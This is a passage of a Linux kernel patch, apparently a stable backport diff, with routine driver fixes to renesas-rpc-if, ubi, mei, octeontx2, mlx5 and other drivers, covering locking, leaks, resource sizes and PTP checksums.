+ 	u32 fcc;
+ 	u32 flags;
+ 
+-	char name[32];
+-
+ 	unsigned int nframes;
+ 	struct uvc_frame *frame;
+ };
+@@ -559,6 +558,7 @@ struct uvc_device {
+ 	/* Status Interrupt Endpoint */
+ 	struct usb_host_endpoint *int_ep;
+ 	struct urb *int_urb;
++	bool flush_status;
+ 	u8 *status;
+ 	struct input_dev *input;
+ 	char input_phys[64];
+diff --git a/drivers/memory/renesas-rpc-if.c b/drivers/memory/renesas-rpc-if.c
+index 61c288d403750..7343dbb79c9f7 100644
+--- a/drivers/memory/renesas-rpc-if.c
++++ b/drivers/memory/renesas-rpc-if.c
+@@ -162,14 +162,36 @@ static const struct regmap_access_table rpcif_volatile_table = {
+ 	.n_yes_ranges	= ARRAY_SIZE(rpcif_volatile_ranges),
+ };
+ 
++struct rpcif_priv {
++	struct device *dev;
++	void __iomem *base;
++	void __iomem *dirmap;
++	struct regmap *regmap;
++	struct reset_control *rstc;
++	struct platform_device *vdev;
++	size_t size;
++	enum rpcif_type type;
++	enum rpcif_data_dir dir;
++	u8 bus_size;
++	u8 xfer_size;
++	void *buffer;
++	u32 xferlen;
++	u32 smcr;
++	u32 smadr;
++	u32 command;		/* DRCMR or SMCMR */
++	u32 option;		/* DROPR or SMOPR */
++	u32 enable;		/* DRENR or SMENR */
++	u32 dummy;		/* DRDMCR or SMDMCR */
++	u32 ddr;		/* DRDRENR or SMDRENR */
++};
+ 
+ /*
+  * Custom accessor functions to ensure SM[RW]DR[01] are always accessed with
+- * proper width.  Requires rpcif.xfer_size to be correctly set before!
++ * proper width.  Requires rpcif_priv.xfer_size to be correctly set before!
+  */
+ static int rpcif_reg_read(void *context, unsigned int reg, unsigned int *val)
+ {
+-	struct rpcif *rpc = context;
++	struct rpcif_priv *rpc = context;
+ 
+ 	switch (reg) {
+ 	case RPCIF_SMRDR0:
+@@ -205,7 +227,7 @@ static int rpcif_reg_read(void *context, unsigned int reg, unsigned int *val)
+ 
+ static int rpcif_reg_write(void *context, unsigned int reg, unsigned int val)
+ {
+-	struct rpcif *rpc = context;
++	struct rpcif_priv *rpc = context;
+ 
+ 	switch (reg) {
+ 	case RPCIF_SMWDR0:
+@@ -252,39 +274,18 @@ static const struct regmap_config rpcif_regmap_config = {
+ 	.volatile_table	= &rpcif_volatile_table,
+ };
+ 
+-int rpcif_sw_init(struct rpcif *rpc, struct device *dev)
++int rpcif_sw_init(struct rpcif *rpcif, struct device *dev)
+ {
+-	struct platform_device *pdev = to_platform_device(dev);
+-	struct resource *res;
++	struct rpcif_priv *rpc = dev_get_drvdata(dev);
+ 
+-	rpc->dev = dev;
+-
+-	rpc->base = devm_platform_ioremap_resource_byname(pdev, "regs");
+-	if (IS_ERR(rpc->base))
+-		return PTR_ERR(rpc->base);
+-
+-	rpc->regmap = devm_regmap_init(&pdev->dev, NULL, rpc, &rpcif_regmap_config);
+-	if (IS_ERR(rpc->regmap)) {
+-		dev_err(&pdev->dev,
+-			"failed to init regmap for rpcif, error %ld\n",
+-			PTR_ERR(rpc->regmap));
+-		return	PTR_ERR(rpc->regmap);
+-	}
+-
+-	res = platform_get_resource_byname(pdev, IORESOURCE_MEM, "dirmap");
+-	rpc->dirmap = devm_ioremap_resource(&pdev->dev, res);
+-	if (IS_ERR(rpc->dirmap))
+-		return PTR_ERR(rpc->dirmap);
+-	rpc->size = resource_size(res);
+-
+-	rpc->type = (uintptr_t)of_device_get_match_data(dev);
+-	rpc->rstc = devm_reset_control_get_exclusive(&pdev->dev, NULL);
+-
+-	return PTR_ERR_OR_ZERO(rpc->rstc);
++	rpcif->dev = dev;
++	rpcif->dirmap = rpc->dirmap;
++	rpcif->size = rpc->size;
++	return 0;
+ }
+ EXPORT_SYMBOL(rpcif_sw_init);
+ 
+-static void rpcif_rzg2l_timing_adjust_sdr(struct rpcif *rpc)
++static void rpcif_rzg2l_timing_adjust_sdr(struct rpcif_priv *rpc)
+ {
+ 	regmap_write(rpc->regmap, RPCIF_PHYWR, 0xa5390000);
+ 	regmap_write(rpc->regmap, RPCIF_PHYADD, 0x80000000);
+@@ -298,8 +299,9 @@ static void rpcif_rzg2l_timing_adjust_sdr(struct rpcif *rpc)
+ 	regmap_write(rpc->regmap, RPCIF_PHYADD, 0x80000032);
+ }
+ 
+-int rpcif_hw_init(struct rpcif *rpc, bool hyperflash)
++int rpcif_hw_init(struct rpcif *rpcif, bool hyperflash)
+ {
++	struct rpcif_priv *rpc = dev_get_drvdata(rpcif->dev);
+ 	u32 dummy;
+ 
+ 	pm_runtime_get_sync(rpc->dev);
+@@ -360,7 +362,7 @@ int rpcif_hw_init(struct rpcif *rpc, bool hyperflash)
+ }
+ EXPORT_SYMBOL(rpcif_hw_init);
+ 
+-static int wait_msg_xfer_end(struct rpcif *rpc)
++static int wait_msg_xfer_end(struct rpcif_priv *rpc)
+ {
+ 	u32 sts;
+ 
+@@ -369,7 +371,7 @@ static int wait_msg_xfer_end(struct rpcif *rpc)
+ 					USEC_PER_SEC);
+ }
+ 
+-static u8 rpcif_bits_set(struct rpcif *rpc, u32 nbytes)
++static u8 rpcif_bits_set(struct rpcif_priv *rpc, u32 nbytes)
+ {
+ 	if (rpc->bus_size == 2)
+ 		nbytes /= 2;
+@@ -382,9 +384,11 @@ static u8 rpcif_bit_size(u8 buswidth)
+ 	return buswidth > 4 ? 2 : ilog2(buswidth);
+ }
+ 
+-void rpcif_prepare(struct rpcif *rpc, const struct rpcif_op *op, u64 *offs,
++void rpcif_prepare(struct rpcif *rpcif, const struct rpcif_op *op, u64 *offs,
+ 		   size_t *len)
+ {
++	struct rpcif_priv *rpc = dev_get_drvdata(rpcif->dev);
++
+ 	rpc->smcr = 0;
+ 	rpc->smadr = 0;
+ 	rpc->enable = 0;
+@@ -468,8 +472,9 @@ void rpcif_prepare(struct rpcif *rpc, const struct rpcif_op *op, u64 *offs,
+ }
+ EXPORT_SYMBOL(rpcif_prepare);
+ 
+-int rpcif_manual_xfer(struct rpcif *rpc)
++int rpcif_manual_xfer(struct rpcif *rpcif)
+ {
++	struct rpcif_priv *rpc = dev_get_drvdata(rpcif->dev);
+ 	u32 smenr, smcr, pos = 0, max = rpc->bus_size == 2 ? 8 : 4;
+ 	int ret = 0;
+ 
+@@ -589,7 +594,7 @@ exit:
+ err_out:
+ 	if (reset_control_reset(rpc->rstc))
+ 		dev_err(rpc->dev, "Failed to reset HW\n");
+-	rpcif_hw_init(rpc, rpc->bus_size == 2);
++	rpcif_hw_init(rpcif, rpc->bus_size == 2);
+ 	goto exit;
+ }
+ EXPORT_SYMBOL(rpcif_manual_xfer);
+@@ -636,8 +641,9 @@ static void memcpy_fromio_readw(void *to,
+ 	}
+ }
+ 
+-ssize_t rpcif_dirmap_read(struct rpcif *rpc, u64 offs, size_t len, void *buf)
++ssize_t rpcif_dirmap_read(struct rpcif *rpcif, u64 offs, size_t len, void *buf)
+ {
++	struct rpcif_priv *rpc = dev_get_drvdata(rpcif->dev);
+ 	loff_t from = offs & (rpc->size - 1);
+ 	size_t size = rpc->size - from;
+ 
+@@ -670,8 +676,11 @@ EXPORT_SYMBOL(rpcif_dirmap_read);
+ 
+ static int rpcif_probe(struct platform_device *pdev)
+ {
++	struct device *dev = &pdev->dev;
+ 	struct platform_device *vdev;
+ 	struct device_node *flash;
++	struct rpcif_priv *rpc;
++	struct resource *res;
+ 	const char *name;
+ 	int ret;
+ 
+@@ -692,11 +701,40 @@ static int rpcif_probe(struct platform_device *pdev)
+ 	}
+ 	of_node_put(flash);
+ 
++	rpc = devm_kzalloc(&pdev->dev, sizeof(*rpc), GFP_KERNEL);
++	if (!rpc)
++		return -ENOMEM;
++
++	rpc->base = devm_platform_ioremap_resource_byname(pdev, "regs");
++	if (IS_ERR(rpc->base))
++		return PTR_ERR(rpc->base);
++
++	rpc->regmap = devm_regmap_init(dev, NULL, rpc, &rpcif_regmap_config);
++	if (IS_ERR(rpc->regmap)) {
++		dev_err(dev, "failed to init regmap for rpcif, error %ld\n",
++			PTR_ERR(rpc->regmap));
++		return	PTR_ERR(rpc->regmap);
++	}
++
++	res = platform_get_resource_byname(pdev, IORESOURCE_MEM, "dirmap");
++	rpc->dirmap = devm_ioremap_resource(dev, res);
++	if (IS_ERR(rpc->dirmap))
++		return PTR_ERR(rpc->dirmap);
++	rpc->size = resource_size(res);
++
++	rpc->type = (uintptr_t)of_device_get_match_data(dev);
++	rpc->rstc = devm_reset_control_get_exclusive(dev, NULL);
++	if (IS_ERR(rpc->rstc))
++		return PTR_ERR(rpc->rstc);
++
+ 	vdev = platform_device_alloc(name, pdev->id);
+ 	if (!vdev)
+ 		return -ENOMEM;
+ 	vdev->dev.parent = &pdev->dev;
+-	platform_set_drvdata(pdev, vdev);
++
++	rpc->dev = &pdev->dev;
++	rpc->vdev = vdev;
++	platform_set_drvdata(pdev, rpc);
+ 
+ 	ret = platform_device_add(vdev);
+ 	if (ret) {
+@@ -709,9 +747,9 @@ static int rpcif_probe(struct platform_device *pdev)
+ 
+ static int rpcif_remove(struct platform_device *pdev)
+ {
+-	struct platform_device *vdev = platform_get_drvdata(pdev);
++	struct rpcif_priv *rpc = platform_get_drvdata(pdev);
+ 
+-	platform_device_unregister(vdev);
++	platform_device_unregister(rpc->vdev);
+ 
+ 	return 0;
+ }
+diff --git a/drivers/mfd/arizona-core.c b/drivers/mfd/arizona-core.c
+index cbf1dd90b70d5..b1c53e0407710 100644
+--- a/drivers/mfd/arizona-core.c
++++ b/drivers/mfd/arizona-core.c
+@@ -45,7 +45,7 @@ int arizona_clk32k_enable(struct arizona *arizona)
+ 	if (arizona->clk32k_ref == 1) {
+ 		switch (arizona->pdata.clk32k_src) {
+ 		case ARIZONA_32KZ_MCLK1:
+-			ret = pm_runtime_get_sync(arizona->dev);
++			ret = pm_runtime_resume_and_get(arizona->dev);
+ 			if (ret != 0)
+ 				goto err_ref;
+ 			ret = clk_prepare_enable(arizona->mclk[ARIZONA_MCLK1]);
+diff --git a/drivers/misc/mei/bus-fixup.c b/drivers/misc/mei/bus-fixup.c
+index 71fbf0bc84532..5eeb4d04c0962 100644
+--- a/drivers/misc/mei/bus-fixup.c
++++ b/drivers/misc/mei/bus-fixup.c
+@@ -151,7 +151,7 @@ static int mei_fwver(struct mei_cl_device *cldev)
+ 	ret = __mei_cl_send(cldev->cl, (u8 *)&req, sizeof(req), 0,
+ 			    MEI_CL_IO_TX_BLOCKING);
+ 	if (ret < 0) {
+-		dev_err(&cldev->dev, "Could not send ReqFWVersion cmd\n");
++		dev_err(&cldev->dev, "Could not send ReqFWVersion cmd ret = %d\n", ret);
+ 		return ret;
+ 	}
+ 
+@@ -163,7 +163,7 @@ static int mei_fwver(struct mei_cl_device *cldev)
+ 		 * Should be at least one version block,
+ 		 * error out if nothing found
+ 		 */
+-		dev_err(&cldev->dev, "Could not read FW version\n");
++		dev_err(&cldev->dev, "Could not read FW version ret = %d\n", bytes_recv);
+ 		return -EIO;
+ 	}
+ 
+@@ -376,7 +376,7 @@ static int mei_nfc_if_version(struct mei_cl *cl,
+ 	ret = __mei_cl_send(cl, (u8 *)&cmd, sizeof(cmd), 0,
+ 			    MEI_CL_IO_TX_BLOCKING);
+ 	if (ret < 0) {
+-		dev_err(bus->dev, "Could not send IF version cmd\n");
++		dev_err(bus->dev, "Could not send IF version cmd ret = %d\n", ret);
+ 		return ret;
+ 	}
+ 
+@@ -391,7 +391,7 @@ static int mei_nfc_if_version(struct mei_cl *cl,
+ 	bytes_recv = __mei_cl_recv(cl, (u8 *)reply, if_version_length, &vtag,
+ 				   0, 0);
+ 	if (bytes_recv < 0 || (size_t)bytes_recv < if_version_length) {
+-		dev_err(bus->dev, "Could not read IF version\n");
++		dev_err(bus->dev, "Could not read IF version ret = %d\n", bytes_recv);
+ 		ret = -EIO;
+ 		goto err;
+ 	}
+diff --git a/drivers/misc/vmw_balloon.c b/drivers/misc/vmw_balloon.c
+index 61a2be712bf7b..9ce9b9e0e9b63 100644
+--- a/drivers/misc/vmw_balloon.c
++++ b/drivers/misc/vmw_balloon.c
+@@ -1709,7 +1709,7 @@ static void __init vmballoon_debugfs_init(struct vmballoon *b)
+ static void __exit vmballoon_debugfs_exit(struct vmballoon *b)
+ {
+ 	static_key_disable(&balloon_stat_enabled.key);
+-	debugfs_remove(debugfs_lookup("vmmemctl", NULL));
++	debugfs_lookup_and_remove("vmmemctl", NULL);
+ 	kfree(b->stats);
+ 	b->stats = NULL;
+ }
+diff --git a/drivers/mtd/ubi/build.c b/drivers/mtd/ubi/build.c
+index a901f8edfa41d..7f65af1697519 100644
+--- a/drivers/mtd/ubi/build.c
++++ b/drivers/mtd/ubi/build.c
+@@ -468,6 +468,7 @@ static int uif_init(struct ubi_device *ubi)
+ 			err = ubi_add_volume(ubi, ubi->volumes[i]);
+ 			if (err) {
+ 				ubi_err(ubi, "cannot add volume %d", i);
++				ubi->volumes[i] = NULL;
+ 				goto out_volumes;
+ 			}
+ 		}
+@@ -663,6 +664,12 @@ static int io_init(struct ubi_device *ubi, int max_beb_per1024)
+ 	ubi->ec_hdr_alsize = ALIGN(UBI_EC_HDR_SIZE, ubi->hdrs_min_io_size);
+ 	ubi->vid_hdr_alsize = ALIGN(UBI_VID_HDR_SIZE, ubi->hdrs_min_io_size);
+ 
++	if (ubi->vid_hdr_offset && ((ubi->vid_hdr_offset + UBI_VID_HDR_SIZE) >
++	    ubi->vid_hdr_alsize)) {
++		ubi_err(ubi, "VID header offset %d too large.", ubi->vid_hdr_offset);
++		return -EINVAL;
++	}
++
+ 	dbg_gen("min_io_size      %d", ubi->min_io_size);
+ 	dbg_gen("max_write_size   %d", ubi->max_write_size);
+ 	dbg_gen("hdrs_min_io_size %d", ubi->hdrs_min_io_size);
+diff --git a/drivers/mtd/ubi/fastmap-wl.c b/drivers/mtd/ubi/fastmap-wl.c
+index 0ee452275578d..863f571f1adb5 100644
+--- a/drivers/mtd/ubi/fastmap-wl.c
++++ b/drivers/mtd/ubi/fastmap-wl.c
+@@ -146,13 +146,15 @@ void ubi_refill_pools(struct ubi_device *ubi)
+ 	if (ubi->fm_anchor) {
+ 		wl_tree_add(ubi->fm_anchor, &ubi->free);
+ 		ubi->free_count++;
++		ubi->fm_anchor = NULL;
+ 	}
+ 
+-	/*
+-	 * All available PEBs are in ubi->free, now is the time to get
+-	 * the best anchor PEBs.
+-	 */
+-	ubi->fm_anchor = ubi_wl_get_fm_peb(ubi, 1);
++	if (!ubi->fm_disabled)
++		/*
++		 * All available PEBs are in ubi->free, now is the time to get
++		 * the best anchor PEBs.
++		 */
++		ubi->fm_anchor = ubi_wl_get_fm_peb(ubi, 1);
+ 
+ 	for (;;) {
+ 		enough = 0;
+diff --git a/drivers/mtd/ubi/vmt.c b/drivers/mtd/ubi/vmt.c
+index 8fcc0bdf06358..2c867d16f89f7 100644
+--- a/drivers/mtd/ubi/vmt.c
++++ b/drivers/mtd/ubi/vmt.c
+@@ -464,7 +464,7 @@ int ubi_resize_volume(struct ubi_volume_desc *desc, int reserved_pebs)
+ 		for (i = 0; i < -pebs; i++) {
+ 			err = ubi_eba_unmap_leb(ubi, vol, reserved_pebs + i);
+ 			if (err)
+-				goto out_acc;
++				goto out_free;
+ 		}
+ 		spin_lock(&ubi->volumes_lock);
+ 		ubi->rsvd_pebs += pebs;
+@@ -512,8 +512,10 @@ out_acc:
+ 		ubi->avail_pebs += pebs;
+ 		spin_unlock(&ubi->volumes_lock);
+ 	}
++	return err;
++
+ out_free:
+-	kfree(new_eba_tbl);
++	ubi_eba_destroy_table(new_eba_tbl);
+ 	return err;
+ }
+ 
+@@ -580,6 +582,7 @@ int ubi_add_volume(struct ubi_device *ubi, struct ubi_volume *vol)
+ 	if (err) {
+ 		ubi_err(ubi, "cannot add character device for volume %d, error %d",
+ 			vol_id, err);
++		vol_release(&vol->dev);
+ 		return err;
+ 	}
+ 
+@@ -590,15 +593,14 @@ int ubi_add_volume(struct ubi_device *ubi, struct ubi_volume *vol)
+ 	vol->dev.groups = volume_dev_groups;
+ 	dev_set_name(&vol->dev, "%s_%d", ubi->ubi_name, vol->vol_id);
+ 	err = device_register(&vol->dev);
+-	if (err)
+-		goto out_cdev;
++	if (err) {
++		cdev_del(&vol->cdev);
++		put_device(&vol->dev);
++		return err;
++	}
+ 
+ 	self_check_volumes(ubi);
+ 	return err;
+-
+-out_cdev:
+-	cdev_del(&vol->cdev);
+-	return err;
+ }
+ 
+ /**
+diff --git a/drivers/mtd/ubi/wl.c b/drivers/mtd/ubi/wl.c
+index 68eb0f21b3fe2..9e14319225c97 100644
+--- a/drivers/mtd/ubi/wl.c
++++ b/drivers/mtd/ubi/wl.c
+@@ -890,8 +890,11 @@ static int wear_leveling_worker(struct ubi_device *ubi, struct ubi_work *wrk,
+ 
+ 	err = do_sync_erase(ubi, e1, vol_id, lnum, 0);
+ 	if (err) {
+-		if (e2)
++		if (e2) {
++			spin_lock(&ubi->wl_lock);
+ 			wl_entry_destroy(ubi, e2);
++			spin_unlock(&ubi->wl_lock);
++		}
+ 		goto out_ro;
+ 	}
+ 
+@@ -973,11 +976,11 @@ out_error:
+ 	spin_lock(&ubi->wl_lock);
+ 	ubi->move_from = ubi->move_to = NULL;
+ 	ubi->move_to_put = ubi->wl_scheduled = 0;
++	wl_entry_destroy(ubi, e1);
++	wl_entry_destroy(ubi, e2);
+ 	spin_unlock(&ubi->wl_lock);
+ 
+ 	ubi_free_vid_buf(vidb);
+-	wl_entry_destroy(ubi, e1);
+-	wl_entry_destroy(ubi, e2);
+ 
+ out_ro:
+ 	ubi_ro_mode(ubi);
+@@ -1130,14 +1133,18 @@ static int __erase_worker(struct ubi_device *ubi, struct ubi_work *wl_wrk)
+ 		/* Re-schedule the LEB for erasure */
+ 		err1 = schedule_erase(ubi, e, vol_id, lnum, 0, false);
+ 		if (err1) {
++			spin_lock(&ubi->wl_lock);
+ 			wl_entry_destroy(ubi, e);
++			spin_unlock(&ubi->wl_lock);
+ 			err = err1;
+ 			goto out_ro;
+ 		}
+ 		return err;
+ 	}
+ 
++	spin_lock(&ubi->wl_lock);
+ 	wl_entry_destroy(ubi, e);
++	spin_unlock(&ubi->wl_lock);
+ 	if (err != -EIO)
+ 		/*
+ 		 * If this is not %-EIO, we have no idea what to do. Scheduling
+@@ -1253,6 +1260,18 @@ int ubi_wl_put_peb(struct ubi_device *ubi, int vol_id, int lnum,
+ retry:
+ 	spin_lock(&ubi->wl_lock);
+ 	e = ubi->lookuptbl[pnum];
++	if (!e) {
++		/*
++		 * This wl entry has been removed for some errors by other
++		 * process (eg. wear leveling worker), corresponding process
++		 * (except __erase_worker, which cannot concurrent with
++		 * ubi_wl_put_peb) will set ubi ro_mode at the same time,
++		 * just ignore this wl entry.
++		 */
++		spin_unlock(&ubi->wl_lock);
++		up_read(&ubi->fm_protect);
++		return 0;
++	}
+ 	if (e == ubi->move_from) {
+ 		/*
+ 		 * User is putting the physical eraseblock which was selected to
+diff --git a/drivers/net/dsa/ocelot/felix_vsc9959.c b/drivers/net/dsa/ocelot/felix_vsc9959.c
+index 26a35ae322d10..cc89cff029e1f 100644
+--- a/drivers/net/dsa/ocelot/felix_vsc9959.c
++++ b/drivers/net/dsa/ocelot/felix_vsc9959.c
+@@ -513,7 +513,7 @@ static const char * const vsc9959_resource_names[TARGET_MAX] = {
+  * SGMII/QSGMII MAC PCS can be found.
+  */
+ static const struct resource vsc9959_imdio_res =
+-	DEFINE_RES_MEM_NAMED(0x8030, 0x8040, "imdio");
++	DEFINE_RES_MEM_NAMED(0x8030, 0x10, "imdio");
+ 
+ static const struct reg_field vsc9959_regfields[REGFIELD_MAX] = {
+ 	[ANA_ADVLEARN_VLAN_CHK] = REG_FIELD(ANA_ADVLEARN, 6, 6),
+diff --git a/drivers/net/dsa/ocelot/seville_vsc9953.c b/drivers/net/dsa/ocelot/seville_vsc9953.c
+index 7af33b2c685da..c2863d6d870fb 100644
+--- a/drivers/net/dsa/ocelot/seville_vsc9953.c
++++ b/drivers/net/dsa/ocelot/seville_vsc9953.c
+@@ -923,8 +923,8 @@ static int vsc9953_mdio_bus_alloc(struct ocelot *ocelot)
+ 
+ 	rc = mscc_miim_setup(dev, &bus, "VSC9953 internal MDIO bus",
+ 			     ocelot->targets[GCB],
+-			     ocelot->map[GCB][GCB_MIIM_MII_STATUS & REG_MASK]);
+-
++			     ocelot->map[GCB][GCB_MIIM_MII_STATUS & REG_MASK],
++			     true);
+ 	if (rc) {
+ 		dev_err(dev, "failed to setup MDIO bus\n");
+ 		return rc;
+diff --git a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_flows.c b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_flows.c
+index 709fc0114fbd2..0f7345a96965b 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_flows.c
++++ b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_flows.c
+@@ -765,7 +765,7 @@ static int otx2_prepare_ipv6_flow(struct ethtool_rx_flow_spec *fsp,
+ 
+ 		/* NPC profile doesn't extract AH/ESP header fields */
+ 		if ((ah_esp_mask->spi & ah_esp_hdr->spi) ||
+-		    (ah_esp_mask->tclass & ah_esp_mask->tclass))
++		    (ah_esp_mask->tclass & ah_esp_hdr->tclass))
+ 			return -EOPNOTSUPP;
+ 
+ 		if (flow_type == AH_V6_FLOW)
+diff --git a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_txrx.c b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_txrx.c
+index ef10aef3cda02..7045fedfd73a0 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_txrx.c
++++ b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_txrx.c
+@@ -10,6 +10,7 @@
+ #include <net/tso.h>
+ #include <linux/bpf.h>
+ #include <linux/bpf_trace.h>
++#include <net/ip6_checksum.h>
+ 
+ #include "otx2_reg.h"
+ #include "otx2_common.h"
+@@ -699,7 +700,7 @@ static void otx2_sqe_add_ext(struct otx2_nic *pfvf, struct otx2_snd_queue *sq,
+ 
+ static void otx2_sqe_add_mem(struct otx2_snd_queue *sq, int *offset,
+ 			     int alg, u64 iova, int ptp_offset,
+-			     u64 base_ns, int udp_csum)
++			     u64 base_ns, bool udp_csum_crt)
+ {
+ 	struct nix_sqe_mem_s *mem;
+ 
+@@ -711,7 +712,7 @@ static void otx2_sqe_add_mem(struct otx2_snd_queue *sq, int *offset,
+ 
+ 	if (ptp_offset) {
+ 		mem->start_offset = ptp_offset;
+-		mem->udp_csum_crt = udp_csum;
++		mem->udp_csum_crt = !!udp_csum_crt;
+ 		mem->base_ns = base_ns;
+ 		mem->step_type = 1;
+ 	}
+@@ -986,10 +987,11 @@ static bool otx2_validate_network_transport(struct sk_buff *skb)
+ 	return false;
+ }
+ 
+-static bool otx2_ptp_is_sync(struct sk_buff *skb, int *offset, int *udp_csum)
++static bool otx2_ptp_is_sync(struct sk_buff *skb, int *offset, bool *udp_csum_crt)
+ {
+ 	struct ethhdr *eth = (struct ethhdr *)(skb->data);
+ 	u16 nix_offload_hlen = 0, inner_vhlen = 0;
++	bool udp_hdr_present = false, is_sync;
+ 	u8 *data = skb->data, *msgtype;
+ 	__be16 proto = eth->h_proto;
+ 	int network_depth = 0;
+@@ -1029,45 +1031,81 @@ static bool otx2_ptp_is_sync(struct sk_buff *skb, int *offset, int *udp_csum)
+ 		if (!otx2_validate_network_transport(skb))
+ 			return false;
+ 
+-		*udp_csum = 1;
+ 		*offset = nix_offload_hlen + skb_transport_offset(skb) +
+ 			  sizeof(struct udphdr);
++		udp_hdr_present = true;
++
+ 	}
+ 
+ 	msgtype = data + *offset;
+-
+ 	/* Check PTP messageId is SYNC or not */
+-	return (*msgtype & 0xf) == 0;
++	is_sync = !(*msgtype & 0xf);
++	if (is_sync)
++		*udp_csum_crt = udp_hdr_present;
++	else
++		*offset = 0;
++
++	return is_sync;
+ }
+ 
+ static void otx2_set_txtstamp(struct otx2_nic *pfvf, struct sk_buff *skb,
+ 			      struct otx2_snd_queue *sq, int *offset)
+ {
++	struct ethhdr	*eth = (struct ethhdr *)(skb->data);
+ 	struct ptpv2_tstamp *origin_tstamp;
+-	int ptp_offset = 0, udp_csum = 0;
++	bool udp_csum_crt = false;
++	unsigned int udphoff;
+ 	struct timespec64 ts;
++	int ptp_offset = 0;
++	__wsum skb_csum;
+ 	u64 iova;
+ 
+ 	if (unlikely(!skb_shinfo(skb)->gso_size &&
+ 		     (skb_shinfo(skb)->tx_flags & SKBTX_HW_TSTAMP))) {
+-		if (unlikely(pfvf->flags & OTX2_FLAG_PTP_ONESTEP_SYNC)) {
+-			if (otx2_ptp_is_sync(skb, &ptp_offset, &udp_csum)) {
+-				origin_tstamp = (struct ptpv2_tstamp *)
+-						((u8 *)skb->data + ptp_offset +
+-						 PTP_SYNC_SEC_OFFSET);
+-				ts = ns_to_timespec64(pfvf->ptp->tstamp);
+-				origin_tstamp->seconds_msb = htons((ts.tv_sec >> 32) & 0xffff);
+-				origin_tstamp->seconds_lsb = htonl(ts.tv_sec & 0xffffffff);
+-				origin_tstamp->nanoseconds = htonl(ts.tv_nsec);
+-				/* Point to correction field in PTP packet */
+-				ptp_offset += 8;
++		if (unlikely(pfvf->flags & OTX2_FLAG_PTP_ONESTEP_SYNC &&
++			     otx2_ptp_is_sync(skb, &ptp_offset, &udp_csum_crt))) {
++			origin_tstamp = (struct ptpv2_tstamp *)
++					((u8 *)skb->data + ptp_offset +
++					 PTP_SYNC_SEC_OFFSET);
++			ts = ns_to_timespec64(pfvf->ptp->tstamp);
++			origin_tstamp->seconds_msb = htons((ts.tv_sec >> 32) & 0xffff);
++			origin_tstamp->seconds_lsb = htonl(ts.tv_sec & 0xffffffff);
++			origin_tstamp->nanoseconds = htonl(ts.tv_nsec);
++			/* Point to correction field in PTP packet */
++			ptp_offset += 8;
++
++			/* When user disables hw checksum, stack calculates the csum,
++			 * but it does not cover ptp timestamp which is added later.
++			 * Recalculate the checksum manually considering the timestamp.
++			 */
++			if (udp_csum_crt) {
++				struct udphdr *uh = udp_hdr(skb);
++
++				if (skb->ip_summed != CHECKSUM_PARTIAL && uh->check != 0) {
++					udphoff = skb_transport_offset(skb);
++					uh->check = 0;
++					skb_csum = skb_checksum(skb, udphoff, skb->len - udphoff,
++								0);
++					if (ntohs(eth->h_proto) == ETH_P_IPV6)
++						uh->check = csum_ipv6_magic(&ipv6_hdr(skb)->saddr,
++									    &ipv6_hdr(skb)->daddr,
++									    skb->len - udphoff,
++									    ipv6_hdr(skb)->nexthdr,
++									    skb_csum);
++					else
++						uh->check = csum_tcpudp_magic(ip_hdr(skb)->saddr,
++									      ip_hdr(skb)->daddr,
++									      skb->len - udphoff,
++									      IPPROTO_UDP,
++									      skb_csum);
++				}
+ 			}
+ 		} else {
+ 			skb_shinfo(skb)->tx_flags |= SKBTX_IN_PROGRESS;
+ 		}
+ 		iova = sq->timestamps->iova + (sq->head * sizeof(u64));
+ 		otx2_sqe_add_mem(sq, offset, NIX_SENDMEMALG_E_SETTSTMP, iova,
+-				 ptp_offset, pfvf->ptp->base_ns, udp_csum);
++				 ptp_offset, pfvf->ptp->base_ns, udp_csum_crt);
+ 	} else {
+ 		skb_tx_timestamp(skb);
+ 	}
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/ecpf.c b/drivers/net/ethernet/mellanox/mlx5/core/ecpf.c
+index cdc87ecae5d39..d000236ddbac5 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/ecpf.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/ecpf.c
+@@ -90,4 +90,8 @@ void mlx5_ec_cleanup(struct mlx5_core_dev *dev)
+ 	err = mlx5_wait_for_pages(dev, &dev->priv.page_counters[MLX5_HOST_PF]);
+ 	if (err)
+ 		mlx5_core_warn(dev, "Timeout reclaiming external host PF pages err(%d)\n", err);
++
++	err = mlx5_wait_for_pages(dev, &dev->priv.page_counters[MLX5_VF]);
++	if (err)
++		mlx5_core_warn(dev, "Timeout reclaiming external host VFs pages err(%d)\n", err);
+ }
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en/ptp.c b/drivers/net/ethernet/mellanox/mlx5/core/en/ptp.c
+index 8469e9c386706..ae75e230170b5 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en/ptp.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en/ptp.c
+@@ -86,7 +86,19 @@ static bool mlx5e_ptp_ts_cqe_drop(struct mlx5e_ptpsq *ptpsq, u16 skb_cc, u16 skb
+ 	return (ptpsq->ts_cqe_ctr_mask && (skb_cc != skb_id));
+ }
+ 
+-static void mlx5e_ptp_skb_fifo_ts_cqe_resync(struct mlx5e_ptpsq *ptpsq, u16 skb_cc, u16 skb_id)
++static bool mlx5e_ptp_ts_cqe_ooo(struct mlx5e_ptpsq *ptpsq, u16 skb_id)
++{
++	u16 skb_cc = PTP_WQE_CTR2IDX(ptpsq->skb_fifo_cc);
++	u16 skb_pc = PTP_WQE_CTR2IDX(ptpsq->skb_fifo_pc);
++
++	if (PTP_WQE_CTR2IDX(skb_id - skb_cc) >= PTP_WQE_CTR2IDX(skb_pc - skb_cc))
++		return true;
++
++	return false;
++}
++
++static void mlx5e_ptp_skb_fifo_ts_cqe_resync(struct mlx5e_ptpsq *ptpsq, u16 skb_cc,
++					     u16 skb_id, int budget)
+ {
+ 	struct skb_shared_hwtstamps hwts = {};
+ 	struct sk_buff *skb;
+@@ -98,6 +110,7 @@ static void mlx5e_ptp_skb_fifo_ts_cqe_resync(struct mlx5e_ptpsq *ptpsq, u16 skb_
+ 		hwts.hwtstamp = mlx5e_skb_cb_get_hwts(skb)->cqe_hwtstamp;
